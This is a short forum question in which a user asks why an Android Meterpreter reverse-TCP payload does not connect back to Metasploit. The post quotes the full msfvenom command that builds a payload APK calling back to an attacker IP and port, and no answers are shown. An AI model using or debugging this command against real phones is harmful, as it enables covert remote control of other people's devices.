Android Doesn't Connect Back to Metasploit with App Payload?

Sep 14, 2015 04:33 PM
Sep 14, 2015 04:56 PM

I am trying to connect my android device to metasploit via reverse tcp, but it never shows up on the console. I have a Nexus 5 running Nethunter and Android 5.1.1

The command I used was: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > base.apk

In my case, 192.168.43.124 is the attacker machine, and 4444 is the default port that Metasploit gave me. From my understanding, the phone's IP isn't important. I have tried this on multiple devices and networks and can't get it to connect.

Do I need to select architecture, or runtime?

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!